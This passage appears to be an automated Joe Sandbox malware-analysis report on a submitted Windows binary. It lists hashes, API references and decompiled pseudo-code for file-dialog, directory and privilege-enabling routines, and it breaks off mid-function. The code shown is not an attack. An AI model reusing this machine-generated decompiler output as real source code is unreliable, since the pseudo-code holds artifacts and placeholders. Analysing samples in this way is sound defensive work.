Instruction ID: b84ae5ce1a40e189d67f99545aac3dcac7c0c8b667399bc77f055d15fa696a67
Opcode Fuzzy Hash: fb91ef932d9f27f48a46d7572397d10516eed49c1aaedf30ac6a450b2e0815ea
Instruction Fuzzy Hash: 77A011E22A8002BC3208A2022C02C3B02ACC8CAB20330C8EEF83A8A080A88088000833

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E580

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cb8bace61d761f7f71d83a803f6a4929fbdc4726b28ef8d235bfb016120c917a
Instruction ID: 59ad74d97c2f39abb635a6504197fc37bc82981960765c2e81ec3b039d0bc8f2
Opcode Fuzzy Hash: cb8bace61d761f7f71d83a803f6a4929fbdc4726b28ef8d235bfb016120c917a
Instruction Fuzzy Hash: 54A011C22A8002BC320822A02C02C3B02ACC8C8B20330C8EEF83A8A080B88088000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E580

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 104c9b7c75e8322f58e9c600cc8320fcce54bd9df67084d6ec953caaf5c426e4
Instruction ID: 59ad74d97c2f39abb635a6504197fc37bc82981960765c2e81ec3b039d0bc8f2
Opcode Fuzzy Hash: 104c9b7c75e8322f58e9c600cc8320fcce54bd9df67084d6ec953caaf5c426e4
Instruction Fuzzy Hash: 54A011C22A8002BC320822A02C02C3B02ACC8C8B20330C8EEF83A8A080B88088000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E580

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5998ccaa520de3fa2b59cab228a6f02f28c42f0157cdfb3ba51c42d2381a3db4
Instruction ID: 4ea4e9dad8b6913ca5987cc6b7b63803a70e0b6d73d09aaa21e9593ef7893d79
Opcode Fuzzy Hash: 5998ccaa520de3fa2b59cab228a6f02f28c42f0157cdfb3ba51c42d2381a3db4
Instruction Fuzzy Hash: CDA011C22A80003C320822A02C02C3B0AACC8E8B22330C2EEF838AA080B88088000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 928b064527da4d99f0eb0cbf1b6c82b65bb6a1b1cc1019929c63eb0292655544
Instruction ID: f37db587546d3f66270ebde55ab7140187e7f8e5938c8fdbe673563c390c90e9
Opcode Fuzzy Hash: 928b064527da4d99f0eb0cbf1b6c82b65bb6a1b1cc1019929c63eb0292655544
Instruction Fuzzy Hash: 25A011C22A8002BC320822002E02C3B0AACC8CAF20330C8EEF83A80080B8808C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b1661564bd9cb9a0ae10e95893b8750c76ce413b21d209b828d20a1f3926e8a0
Instruction ID: f37db587546d3f66270ebde55ab7140187e7f8e5938c8fdbe673563c390c90e9
Opcode Fuzzy Hash: b1661564bd9cb9a0ae10e95893b8750c76ce413b21d209b828d20a1f3926e8a0
Instruction Fuzzy Hash: 25A011C22A8002BC320822002E02C3B0AACC8CAF20330C8EEF83A80080B8808C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 222e13a04f5941076488bc6d9bf79e51675edaac133de38652133d36d9d47245
Instruction ID: f37db587546d3f66270ebde55ab7140187e7f8e5938c8fdbe673563c390c90e9
Opcode Fuzzy Hash: 222e13a04f5941076488bc6d9bf79e51675edaac133de38652133d36d9d47245
Instruction Fuzzy Hash: 25A011C22A8002BC320822002E02C3B0AACC8CAF20330C8EEF83A80080B8808C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7E51F

Part of subcall function 00B7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7E8D0
Part of subcall function 00B7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7E8E1

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4f3d9ee7218402c78f77b0e8d370945b2b2d07eb89fc647fad73c655dacb4b31
Instruction ID: f37db587546d3f66270ebde55ab7140187e7f8e5938c8fdbe673563c390c90e9
Opcode Fuzzy Hash: 4f3d9ee7218402c78f77b0e8d370945b2b2d07eb89fc647fad73c655dacb4b31
Instruction Fuzzy Hash: 25A011C22A8002BC320822002E02C3B0AACC8CAF20330C8EEF83A80080B8808C000832

Uniqueness

Uniqueness Score: -1.00%

Function 00B69F09 Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B69F09(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 8)); // executed
				asm("sbb al, al");
				return  ~(_t2 - 1) + 1;
			}

0x00b69f0c
0x00b69f15
0x00b69f19

APIs

SetEndOfFile.KERNELBASE(?,00B6903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00B69F0C

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 9148ffc0771d34bf56f47cbd886c77a52031d1b22dcfc7c9642edc1b8bcb9f90
Instruction ID: 6ad50ac971507b35b040df2e9e28f761431b90e7a41bda9d92af02484711d24c
Opcode Fuzzy Hash: 9148ffc0771d34bf56f47cbd886c77a52031d1b22dcfc7c9642edc1b8bcb9f90
Instruction Fuzzy Hash: 24A0113008000A8A8E002B32CA0820C3B20EB22BC030002A8A00ACB0A2CB22882B8A00

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AC04 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7AC04(WCHAR* _a4) {
				signed int _t4;

				_t4 = SetCurrentDirectoryW(_a4); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}

0x00b7ac08
0x00b7ac13

APIs

SetCurrentDirectoryW.KERNELBASE(?,00B7AE72,C:\Users\user\Desktop,00000000,00BA946A,00000006), ref: 00B7AC08

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 46b0007979b59c06626fb54ff16e2af47d9c56af0c01794e35fdc7c719f3810e
Instruction ID: e3db0684588f2443d6a999db20e6fec42199521a9d65ff7c73e8c8cde37dbd26
Opcode Fuzzy Hash: 46b0007979b59c06626fb54ff16e2af47d9c56af0c01794e35fdc7c719f3810e
Instruction Fuzzy Hash: F2A011302002008B82000B328F0AA0EBAAAAFA2B00F00C02AA00080030CB30C820AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B7C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286
timewindowfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B7C220(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t74;
				void* _t137;
				long _t138;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				signed short _t148;
				void* _t149;
				void* _t150;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t158;
				intOrPtr _t159;
				void* _t160;
				int _t162;
				int _t165;
				void* _t168;
				void* _t170;

				_t156 = __edx;
				E00B7EC50(0x1a50);
				_t148 = _a6748;
				_t159 = _a6744;
				_t158 = _a6740;
				if(E00B61316(__edx, _t158, _t159, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t160 = _t159 - 0x110;
					if(_t160 == 0) {
						SetFocus(GetDlgItem(_t158, 0x6c));
						E00B70602( &_a2640, _a6752, 0x800);
						E00B6C36E( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t158, 0x65,  &_a2616);
						 *0xbc3074( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t158, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t162 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00B64092( &_a900, 0x200, L"%s %s %s", E00B6E617(0x99));
							_t170 = _t168 + 0x18;
							SetDlgItemTextW(_t158, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t150 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00B7AF0F(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00B6E617(0x98));
								_t150 = 0x200;
								E00B64092( &_a884, 0x200, L"%s %s",  &_a192);
								_t170 = _t170 + 0x14;
								SetDlgItemTextW(_t158, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t158, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xba8464; // 0x0
							E00B7138A(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t162,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00B64092( &_a896, _t150, L"%s %s %s", E00B6E617(0x99));
							_t168 = _t170 + 0x18;
							SetDlgItemTextW(_t158, 0x6b,  &_a896);
							_t153 =  *0xbbec8c;
							_t157 =  *0xbbec88;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00B7AF0F(_t157, _t153,  &_a212, 0x32);
								_push(E00B6E617(0x98));
								E00B64092( &_a884, _t150, L"%s %s",  &_a192);
								_t168 = _t168 + 0x14;
								SetDlgItemTextW(_t158, 0x69,  &_a884);
							}
						}
						L27:
						_t74 = 0;
						L28:
						return _t74;
					}
					if(_t160 != 1) {
						goto L27;
					}
					_t165 = 2;
					_t137 = (_t148 & 0x0000ffff) - _t165;
					if(_t137 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t165);
						L13:
						_t138 = SendDlgItemMessageW(_t158, 0x66, 0x171, 0, 0);
						if(_t138 != 0) {
							 *0xbc30d0(_t138);
						}
						EndDialog(_t158, _t165);
						goto L1;
					}
					_t142 = _t137 - 0x6a;
					if(_t142 == 0) {
						_t165 = 0;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_t165 = 1;
						goto L13;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						_push(4);
						goto L12;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						goto L13;
					}
					_t146 = _t145 - 1;
					if(_t146 == 0) {
						_push(3);
						goto L12;
					}
					if(_t146 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t74 = 1;
				goto L28;
			}

0x00b7c220
0x00b7c225
0x00b7c22b
0x00b7c234
0x00b7c23e
0x00b7c25d
0x00b7c267
0x00b7c26d
0x00b7c2e7
0x00b7c302
0x00b7c311
0x00b7c321
0x00b7c342
0x00b7c358
0x00b7c374
0x00b7c379
0x00b7c38c
0x00b7c39c
0x00b7c3a2
0x00b7c3a8
0x00b7c3a9
0x00b7c3ae
0x00b7c3b1
0x00b7c3b8
0x00b7c3d4
0x00b7c3de
0x00b7c3e6
0x00b7c404
0x00b7c409
0x00b7c417
0x00b7c41e
0x00b7c42c
0x00b7c492
0x00b7c42e
0x00b7c448
0x00b7c44c
0x00b7c45b
0x00b7c463
0x00b7c477
0x00b7c47c
0x00b7c48a
0x00b7c48a
0x00b7c4a7
0x00b7c4ad
0x00b7c4b8
0x00b7c4c7
0x00b7c4d7
0x00b7c4f1
0x00b7c509
0x00b7c513
0x00b7c51b
0x00b7c535
0x00b7c53a
0x00b7c548
0x00b7c556
0x00b7c55c
0x00b7c562
0x00b7c576
0x00b7c585
0x00b7c59c
0x00b7c5a1
0x00b7c5af
0x00b7c5af
0x00b7c562
0x00b7c5b5
0x00b7c5b5
0x00b7c5bb
0x00b7c5c1
0x00b7c5c1
0x00b7c272
0x00000000
0x00000000
0x00b7c27d
0x00b7c27e
0x00b7c280
0x00b7c2a4
0x00b7c2a4
0x00b7c2a6
0x00b7c2a6
0x00b7c2a7
0x00b7c2b1
0x00b7c2b9
0x00b7c2bc
0x00b7c2bc
0x00b7c2c4
0x00000000
0x00b7c2c4
0x00b7c282
0x00b7c285
0x00b7c2d9
0x00000000
0x00b7c2d9
0x00b7c287
0x00b7c28a
0x00b7c2d6
0x00000000
0x00b7c2d6
0x00b7c28c
0x00b7c28f
0x00b7c2d0
0x00000000
0x00b7c2d0
0x00b7c291
0x00b7c294
0x00000000
0x00000000
0x00b7c296
0x00b7c299
0x00b7c2cc
0x00000000
0x00b7c2cc
0x00b7c29e
0x00000000
0x00000000
0x00000000
0x00b7c29e
0x00b7c25f
0x00b7c261
0x00000000

APIs

Part of subcall function 00B61316: GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
Part of subcall function 00B61316: SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B7C2B1
EndDialog.USER32(?,00000006), ref: 00B7C2C4
GetDlgItem.USER32(?,0000006C), ref: 00B7C2E0
SetFocus.USER32(00000000), ref: 00B7C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00B7C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B7C358
FindFirstFileW.KERNEL32(?,?), ref: 00B7C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B7C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B7C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B7C3D4
_swprintf.LIBCMT ref: 00B7C404

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B7C417
FindClose.KERNEL32(00000000), ref: 00B7C41E
_swprintf.LIBCMT ref: 00B7C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00B7C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B7C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B7C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B7C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B7C509
_swprintf.LIBCMT ref: 00B7C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B7C548
_swprintf.LIBCMT ref: 00B7C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00B7C5AF

Part of subcall function 00B7AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B7AF35
Part of subcall function 00B7AF0F: GetNumberFormatW.KERNEL32 ref: 00B7AF84

Strings

%s %s %s, xrefs: 00B7C3F2, 00B7C527
%s %s, xrefs: 00B7C469, 00B7C58E
REPLACEFILEDLG, xrefs: 00B7C247

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: b641853f2d451aa618055c84f26f0899c70cd46cda97eda7e97882a2d576fa85
Instruction ID: 5aca80101df6c972a51e709cedc7208fe263a884064fd28bfc9652c913c3e488
Opcode Fuzzy Hash: b641853f2d451aa618055c84f26f0899c70cd46cda97eda7e97882a2d576fa85
Instruction Fuzzy Hash: 65918172148344BFD2219BA4CD89FFB7BECEB4AB00F44885DB649D6091DB75AA048762

Uniqueness

Uniqueness Score: -1.00%

Function 00B66FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B66FAA(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t98;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00B7EB78(_t98, _t253);
				E00B7EC50(0x30a8);
				if( *0xba1023 == 0) {
					E00B67A9C(L"SeRestorePrivilege");
					E00B67A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xba1023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00B613BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00B70602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00B83E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00B86088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00B86088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
